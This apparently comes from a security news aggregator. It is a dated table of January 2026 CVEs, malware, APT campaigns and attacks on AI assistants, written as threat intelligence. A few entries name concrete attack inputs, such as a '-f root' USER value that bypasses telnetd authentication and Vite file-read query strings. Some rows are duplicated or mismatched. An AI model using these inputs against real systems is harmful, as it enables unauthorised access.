HOT NEWS 2026 JANUARY HOT NEWS 2026 January(174) February(168) March(221) April(5) May(0) June(0) July(0) August(0) September(0) October(0) November(0) December(0) | HOT NEWS 2026 HOT NEWS 2025 HOT NEWS 2024
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
| 30.1.26 | LLM Jacking | LLM jacking is an attack technique that cybercriminals use to manipulate and exploit an enterprise’s cloud-based LLMs (large language models). LLM jacking involves stealing and selling cloud account credentials to enable malicious access to an enterprise’s LLMs while the victim unknowingly covers the consumption costs. | ATTACK | AI |
| 30.1.26 | CVE-2026-24423 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2026-1340 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2026-1281 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40553 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40554 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40536 | SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40551 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40537 | SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40552 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication. | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-22709 |
In vm2 for version 3.10.0, Promise.prototype.then Promise.prototype.catch
callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. |
VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-1470 | (CVSS score: 9.9) - An eval injection vulnerability that could allow an authenticated user to bypass the Expression sandbox mechanism and achieve full remote code execution on n8n's main node by passing specially crafted JavaScript code | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-0863 | (CVSS score: 8.5) - An eval injection vulnerability that could allow an authenticated user to bypass n8n's python-task-executor sandbox restrictions and run arbitrary Python code on the underlying operating system | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | HoneyMyte | HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns | APT | APT |
| 28.1.26 | Python RAT | Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT | MALWARE | PYTHON |
| 28.1.26 | CVE-2026-24858 | An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | TOAD Attack | When Zoom Phishes You: Unmasking a Novel TOAD Attack Hidden in Legitimate Infrastructure | ATTACK | ATTACK |
| 28.1.26 | Cellbreak | Cellbreak: Grist’s Pyodide Sandbox Escape and the Data-at-Risk Blast Radius | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-24002 | Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | PeckBirdy | PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups | MALWARE | FRAMEWORK |
| 27.1.26 | CVE-2026-21509 | Microsoft Office Security Feature Bypass Vulnerability | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | CVE-2025-69264 | pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | CVE-2025-69263 | pnpm is a package manager. Versions 10.26.2 and below store HTTP tarball dependencies (and git-hosted tarballs) in the lockfile without integrity hashes. | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | SyncFuture Espionage Targeted Campaign | Weaponized in China, Deployed in India: The SyncFuture Espionage Targeted Campaign | CAMPAIGN | CAMPAIGN |
| 26.1.26 | KONNI | KONNI Adopts AI to Generate PowerShell Backdoors | MALWARE | POWERSHELL |
| 26.1.26 | AI-orchestrated cyber espionage campaign | We have developed sophisticated safety and security measures to prevent the misuse of our AI models. | CAMPAIGN | CAMPAIGN |
| 25.1.26 | HOUKEN | SEEKING A PATH BY LIVING ON THE EDGE WITH ZERO-DAYS | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | doxxing campaign | Shifts in the Underground: The Impact of Water Kurita’s (Lumma Stealer) Doxxing | CAMPAIGN | CAMPAIGN |
| 25.1.26 | GhostPoster Campaign | Browser Extensions Gone Rogue: The Full Scope of the GhostPoster Campaign | CAMPAIGN | CAMPAIGN |
| 25.1.26 | CVE-2023-27997 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | CVE-2022-42475 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | UAT-9686 | UAT-9686 actively targets Cisco Secure Email Gateway and Secure Email and Web Manager | GROUP | GROUP |
| 24.1.26 | DynoWiper | Sandworm behind cyberattack on Poland’s power grid in late 2025 | MALWARE | WIPER |
| 24.1.26 | CVE-2024-37079 | vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-54313 | (CVSS score: 7.5) - An embedded malicious code vulnerability in eslint-config-prettier that could allow for execution of a malicious DLL dubbed Scavenger Loader that's designed to deliver an information stealer | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-31125 | (CVSS score: 5.3) - An improper access control vulnerability in Vite Vitejs that could allow contents of arbitrary files to be returned to the browser using ?inline&import or ?raw?import (Fixed in March 2025 with versions 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-34026 | (CVSS score: 9.2) - An authentication bypass in the Versa Concerto SD-WAN orchestration platform that could allow an attacker to access administrative endpoints (Fixed in April 2025 with version 12.2.1 GA) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-68645 | (CVSS score: 8.8) - A PHP remote file inclusion vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow a remote attacker to craft requests to the "/h/rest" endpoint and allow inclusion of arbitrary files from the WebRoot directory without any authentication (Fixed in November 2025 with version 10.1.13) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | Operation DupeHike | Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection.... | OPERATION | OPERATION |
| 24.1.26 | Operation Covert Access | Table of Contents: Introduction: Infection Chain: Targeted sectors: Initial Findings about Campaign: Analysis of Decoy: Technical Analysis: Stage-1: Analysis of Windows Shortcut file (.LNK). Stage-2: Analysis of Batch file. Stage-3: Details analysis of Covert RAT. Conclusion: Seqrite Coverage: IOCs... | OPERATION | OPERATION |
| 24.1.26 | Operation Nomad Leopard | Contents Introduction Key Targets Industries Affected Geographical focus Infection Chain. Initial Findings Looking into the decoy-document Technical Analysis Stage 1 – Malicious ISO File Stage 2 – Malicious LNK File Stage 3 – Final Payload: FALSECUB Infrastructure & Attribution... | OPERATION | OPERATION |
| 23.1.26 | The Skeleton Key | The Skeleton Key: How Attackers Weaponize Trusted RMM Tools for Backdoor Access | MALWARE | TOOL |
| 23.1.26 | CVE-2025-59719 | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | VULNEREBILITY | VULNEREBILITY |
| 23.1.26 | CVE-2025-59718 | A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 | VULNEREBILITY | VULNEREBILITY |
| 23.1.26 | Libheif uncompressed codec lacks bounds check leading to application crash | An out-of-bounds memory access vulnerability exists in the uncompressed decoder component of libheif. A maliciously crafted HEIF image can trigger a denial-of-service condition by causing the libheif library to crash or exhibit other unexpected behavior due to an out-of-bounds memory access. | ALERT | ALERT |
| 23.1.26 | Code injection vulnerability in binary-parser library | The binary-parser library for Node.js contains a code injection vulnerability that may allow arbitrary JavaScript code execution if untrusted input is used to construct parser definitions. Versions prior to 2.3.0 are affected. The issue has been resolved by the developer in a public update. | ALERT | ALERT |
| 23.1.26 | Open5GS WebUI uses a hard-coded secrets including JSON Web Token signing key | The Open5GS WebUI component contains default hardcoded secrets used for security-sensitive operations, including JSON Web Token (JWT) signing. If these defaults are not changed, an attacker can forge valid authentication tokens and gain administrative access to the WebUI. | ALERT | ALERT |
| 23.1.26 | Stack-based buffer overflow in libtasn1 versions v4.20.0 and earlier | A stack-based buffer overflow vulnerability exists in GNU libtasn1, a low-level ASN.1 parsing library. | ALERT | ALERT |
| 23.1.26 | Safetica contains a kernel driver vulnerability | Kernel driver ProcessMonitorDriver.sys in Safetica's endpoint client x64, versions 10.5.75.0 and 11.11.4.0, allows for an unprivileged user to abuse an IOCTL path and terminate protected system processes. | ALERT | ALERT |
| 23.1.26 | Server-Side Template Injection (SSTI) vulnerability exist in Genshi | A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. Genshi processes template expressions using Python’s 'eval()’ and ‘exec()’ functions while allowing fallback access to Python built-in objects. If an attacker can influence template expressions, this behavior can result in arbitrary code execution on the server. | ALERT | ALERT |
| 23.1.26 | dr_flac contains an integer overflow vulnerability that allows for DoS when provided a crafted file | dr_flac, an open-source FLAC audio decoder, part of the dr_libs audio decoder toolset, contains an integer overflow vulnerability allowing for denial of service (DoS) when provided a specific crafted file. An attacker can exploit this vulnerability through providing a tool that uses dr_flac a specially crafted file, and can cause the tool to crash. | ALERT | ALERT |
| 23.1.26 | thelibrarian does not secure its interface, allowing for access to internal system data | New Actors and Threats Emerge as the Threat Landscape Evolves | PAPERS | PAPERS |
| 23.1.26 | Ransomware 2026 | New Actors and Threats Emerge as the Threat Landscape Evolves | PAPERS | PAPERS |
| 23.1.26 | Osiris Ransomware | Osiris Ransomware: New Addition to the Locky Family | RANSOMWARE | RANSOMWARE |
| 23.1.26 | CVE-2026-24061 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable. | VULNEREBILITY | VULNEREBILITY |
| 22.1.26 | Fortinet FortiGate Devices via SSO Accounts | Arctic Wolf has observed a new cluster of automated malicious activity involving unauthorized firewall configuration changes on FortiGate devices. | CAMPAIGN | CAMPAIGN |
| 22.1.26 | CVE-2026-20045 | A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & | VULNEREBILITY | VULNEREBILITY |
| 22.1.26 | PurpleBravo | PurpleBravo’s Targeting of the IT Software Supply Chain | GROUP | GROUP |
| 22.1.26 | CVE-2026-22844 | A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access. | VULNEREBILITY | VULNEREBILITY |
| 21.1.26 | ChainLeak | ChainLeak: Critical AI framework vulnerabilities expose data, enable cloud takeover | VULNEREBILITY | AI |
| 21.1.26 | VoidLink | VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun | MALWARE | AI |
| 21.1.26 | Campaign Targeting LastPass Customers | New Phishing Campaign Targeting LastPass Customers | CAMPAIGN | PHISHING |
| 21.1.26 | CVE-2026-1245 | A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. | VULNEREBILITY | VULNEREBILITY |
| 21.1.26 | Contagious Interview campaign | Threat Actors Expand Abuse of Microsoft Visual Studio Code | CAMPAIGN | CAMPAIGN |
| 21.1.26 | Spread rat | Open-Source Python Script Drives Social Media Phishing Campaign | MALWARE | PYTHON |
| 20.1.26 | Semantic Attack | Weaponizing Calendar Invites: A Semantic Attack on Google Gemini | ATTACK | AI |
| 20.1.26 | Evelyn | From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers | MALWARE | Stealer |
| 19.1.26 | ModeloRAT | Dissecting CrashFix: KongTuke's New Toy | MALWARE | RAT |
| 19.1.26 | StealC | UNO reverse card: stealing cookies from cookie stealers | MALWARE | Stealer |
| 19.1.26 |
StackWarp: Breaking AMD SEV-SNP Integrity via Deterministic Stack-Pointer Manipulation through the CPU’s Stack Engine |
Confidential Virtual Machines (CVMs), such as AMD SEVSNP, aim
to protect guest operating systems from an untrusted host by encrypting state and constraining privileged control. These platforms promise isolation even in multi-tenant cloud setups where simultaneous multithreading (SMT) remains enabled |
PAPERS | PAPERS |
| 19.1.26 | CVE-2025-29943 | Improper access control within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline, potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | WhisperPair | Hijacking Bluetooth Accessories Using Google Fast Pair | HACKING | Bluetooth |
| 18.1.26 | CVE-2025-6965 | There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. We recommend upgrading to version 3.50.2 or above. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | CVE-2025-36911 | In key-based pairing, there is a possible ID due to a logic error in the code. This could lead to remote (proximal/adjacent) information disclosure of user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | thelibrarian does not secure its interface, allowing for access to internal system data | Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails. | ALERT | ALERT |
| 18.1.26 | Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products | A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application. | ALERT | ALERT |
| 17.1.26 | Sicarii Ransomware | Sicarii is a novel Ransomware-as-a-Service (RaaS) operation first discovered last year. The deployed ransomware variant is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. | ALERTS | RANSOM |
| 17.1.26 | LotusLite backdoor delivery campaign | The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. governmental entities. The campaign utilizes politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. | ALERTS | CAMPAIGN |
| 17.1.26 | Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components | Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, identified as Shadow#Reactor. In this multi-stage campaign, text-based files like VBS, PowerShell scripts, and encoded text are responsible for delivering the final Remcos payload. | ALERTS | CAMPAIGN |
| 17.1.26 | deVixor Android malware | deVixor is a new Android banking malware variant observed to target Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers spread this malware by distributing malicious APK files via phishing websites that mimic legitimate automotive businesses. | ALERTS | VIRUS |
| 17.1.26 | VVS Discord Stealer | VVS Stealer is a sophisticated Python-based malware used to target Discord users and exfiltrate sensitive information. As reported by the researchers from Palo Alto Unit42, once deployed the infostealer searches for encrypted Discord tokens within LevelDB directory and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status. | ALERTS | VIRUS |
| 17.1.26 | IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users | A phishing campaign targeting South African organizations is abusing SARS/IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). | ALERTS | PHISHING |
| 17.1.26 | GalleryEye Spyware Masquerades as “Free Saudi Numbers” App | We identified an Android campaign targeting Saudi mobile users with a trojanized application masquerading as a “Free Saudi Numbers” utility, but the underlying threat is GalleryEye hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. | ALERTS | VIRUS |
| 17.1.26 | CVE-2025-14847 - MongoBleed vulnerability exploited in the wild | CVE-2025-14847 is a recently disclosed high severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB and MongoDB Server in versions from 3.6 onward. | ALERTS | VULNEREBILITY |
| 17.1.26 | Multi-Stage AsyncRAT Campaign Abuses Dropbox and Cloudflare | A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails with Dropbox links, the multi-stage attack continues by disguising malicious downloads using double extensions. | ALERTS | CAMPAIGN |
| 17.1.26 | RustyWater Campaigns in the Middle East | CloudSEK recently reported a MuddyWater spear-phishing wave across Middle East targets (diplomatic, maritime, finance, telecom), where spoofed lures and malicious Word docs drop a newer Rust implant they call “RustyWater.” | ALERTS | PHISHING |
| 17.1.26 | That performance report might give you Guloader | A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Following a successful social engineering attempt via malspam, the attached payload (a RAR file) is opened and its embedded Guloader executable is launched to begin the attack chain. | ALERTS | VIRUS |
| 17.1.26 | Astaroth banking malware leverages WhatsApp Web for distribution | Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth dubbed "Boto Cor-de-Rosa." This latest iteration marks a significant evolution in the malware's capabilities, specifically regarding its distribution method. Astaroth now includes a Python-based worm module capable of exploiting WhatsApp Web to spread infection. | ALERTS | VIRUS |
| 17.1.26 | CVE-2025-22226 | VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. A malicious actor with administrative privileges to a virtual machine may be able to exploit this issue to leak memory from the vmx process. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-22225 | VMware ESXi contains an arbitrary write vulnerability. A malicious actor with privileges within the VMX process may trigger an arbitrary kernel write leading to an escape of the sandbox. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-22224 | VMware ESXi, and Workstation contain a TOCTOU (Time-of-Check Time-of-Use) vulnerability that leads to an out-of-bounds write. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-68428 | jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2026-0625 | Multiple D-Link DSL/DIR/DNS devices contain an authentication bypass and improper access control vulnerability in the dnscfg.cgi endpoint that allows an unauthenticated attacker to access DNS configuration functionality | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | Mamba Phishing-as-a-Service Kit | INTRODUCTION CYFIRMA assesses that Mamba 2FA is a representative of a broader class of adversary-in-the-middle phishing frameworks that have become increasingly prevalen | PHISHING | KIT |
| 17.1.26 | SOLYXIMMORTAL | EXECUTIVE SUMMARY SolyxImmortal is a Python-based Windows information-stealing malware that combines credential theft, document harvesting, keystroke logging, screen surveillance, | MALWARE | PYTHON |
| 17.1.26 | KIMSUKI | Kimsuki, an advanced persistent threat (APT) group active since at least 2012, is suspected to be operating out of North Korea in direct support of the regime’s strategic objectives. The… | APT | APT |
| 17.1.26 | Gootloader’s | Planned failure: Gootloader’s malformed ZIP actually works perfectly | MALWARE | LOADER |
| 17.1.26 | LOTUSLITE | LOTUSLITE: Targeted espionage leveraging geopolitical themes | MALWARE | BACKDOOR |
| 16.1.26 | Information Leak and DoS Vulnerabilities in Redmi Buds 3 Pro through 6 Pro | Redmi Buds, a series of Bluetooth earbuds produced and sold by Xiaomi, contain an Information Leak vulnerability and a Denial of Service (DoS) vulnerability in versions 3 Pro through 6 Pro. An attacker within Bluetooth radio range can send specially crafted RFCOMM protocol interactions to the device's internal channels without prior pairing or authentication, enabling the exposure of sensitive call-related data or triggering repeatable firmware crashes. | ALERT | ALERT |
| 16.1.26 | Reprompt | Reprompt: The Single-Click Microsoft Copilot Attack that Silently Steals Your Personal Data | HACKING | AI |
| 16.1.26 | AISURU/Kimwolf | Keeping the Kimwolf at bay: putting a leash on a massive DDoS Botnet. | BOTNET | BOTNET |
| 16.1.26 | UAT-8837 | UAT-8837 targets critical infrastructure sectors in North America | GROUP | GROUP |
| 16.1.26 | CVE-2025-20393 | Reports About Cyberattacks Against Cisco Secure Email Gateway And Cisco Secure Email and Web Manager | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CodeBreach | CodeBreach: Infiltrating the AWS Console Supply Chain and Hijacking AWS GitHub Repositories via CodeBuild | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CVE-2026-23550 | Incorrect Privilege Assignment vulnerability in Modular DS allows Privilege Escalation.This issue affects Modular DS: from n/a through 2.5.1. | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CVE-2026-0227 | PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | "Неблагонадійний фонд": цільові кібератаки UAC-0190 у відношенні СОУ з використанням PLUGGYAPE (CERT-UA#19092) | Упродовж жовтня-грудня 2025 року Національною командою реагування на кіберінциденти, кібератаки, кіберзагрози CERT-UA, у взаємодії з Командою реагування на кіберінциденти ЗС України (в/ч А0334), вжито заходів з дослідження низки цілеспрямованих кібератак у відношенні представників Сил оборони України, які здійснюються під виглядом діяльності благодійних фондів із застосуванням програмного засобу PLUGGYAPE. | BATTLEFIELD UKRAINE | BATTLEFIELD UKRAINE |
| 14.1.26 | VoidLink | Unveiling VoidLink – A Stealthy, Cloud-Native Linux Malware Framework | MALWARE | Linux |
| 14.1.26 | CVE-2025-12420 | A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform. | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | SHADOW#REACTOR | SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployment | CAMPAIGN | CAMPAIGN |
| 14.1.26 | CVE-2025-8110 | Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code. | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | CVE-2025-64155 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests. | VULNEREBILITY | VULNEREBILITY |
| 12.1.26 | GoBruteforcer | Inside GoBruteforcer: AI-Generated Server Defaults, Weak Passwords, and Crypto-Focused Campaigns | BOTNET | BOTNET |
| 11.1.26 | BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability | The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks. | ALERT | ALERT |
| 10.1.26 | RustyWater | Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant | MALWARE | RAT |
| 10.1.26 |
BlueDelta’s Persistent Campaign Against UKR.NET |
Between June 2024 and April 2025, Recorded Future’s Insikt
Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service |
REPORT | REPORT |
| 10.1.26 |
GRU-Linked BlueDelta Evolves Credential Harvesting |
Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). | REPORT | REPORT |
| 10.1.26 | GRU-Linked BlueDelta Evolves Credential Harvesting | Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). | BIGBROTHER | BIGBROTHER |
| 10.1.26 | CVE-2025-69258 | A LoadLibraryEX vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable, leading to execution of attacker-supplied code under the context of SYSTEM on affected installations. | VULNEREBILITY | VULNEREBILITY |
| 10.1.26 | CVE-2025-69260 | (CVSS score: 7.5) - A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote, unauthenticated attacker to create a denial-of-service condition on affected installations | VULNEREBILITY | VULNEREBILITY |
| 10.1.26 | CVE-2025-69259 | (CVSS score: 7.5) - A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote, unauthenticated attacker to create a denial-of-service condition on affected installations | VULNEREBILITY | VULNEREBILITY |
| 9.1.26 | Recent Linux-based activities of the UAT-7290 threat group | Cisco Talos has identified a new campaign attributed to threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe. | ALERTS | GROUP |
| 9.1.26 | PHALT#BLYX malicious campaign | A new malware distribution campaign, tracked under the name PHALT#BLYX, is targeting European hospitality firms using phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs a "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error. | ALERTS | CAMPAIGN |
| 9.1.26 | CVE-2025-52691 - SmarterTools SmarterMail vulnerability | CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. | ALERTS | VULNEREBILITY |
| 9.1.26 | Kimwolf Android botnet | Kimwolf botnet has been reported to have infected more than 2 million Android devices by tunneling through residential proxy networks. According to researchers from XLab the malware is a strain of the AISURU botnet family and has been active on the threat landscape since at least August 2025. The malware has the capability for various DDoS attacks, proxy forwarding, reverse shell and file management, among others. | ALERTS | BOTNET |
| 9.1.26 | TOTOLINK EX200 firmware-upload error handling can activate an unauthenticated root telnet service | A flaw in the firmware-upload error-handling logic of the TOTOLINK EX200 extender can cause the device to unintentionally start an unauthenticated root-level telnet service. This condition may allow a remote authenticated attacker to gain full system access. | ALERT | ALERT |
| 9.1.26 | Vulnerable Python version used in Forcepoint One DLP Client | A vulnerability in the Forcepoint One DLP Client allows bypass of the vendor-implemented Python restrictions designed to prevent arbitrary code execution. | ALERT | ALERT |
| 8.1.26 | Boto-Cor-de-Rosa | Boto-Cor-de-Rosa campaign reveals Astaroth WhatsApp-based worm activity in Brazil | CAMPAIGN | CAMPAIGN |
| 8.1.26 | CVE-2025-66209 | (CVSS score: 10.0) - A command injection vulnerability in the database backup functionality allows any authenticated user with database backup permissions to execute arbitrary commands on the host server, resulting in container escape and full server compromise | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66210 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the database import functionality allows attackers to execute arbitrary commands on managed servers, leading to full infrastructure compromise | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66211 | (CVSS score: 10.0) - A command injection vulnerability in the PostgreSQL init script management allows authenticated users with database permissions to execute arbitrary commands as root on the server | VULNEREBILITY | VULNEREBILITY |
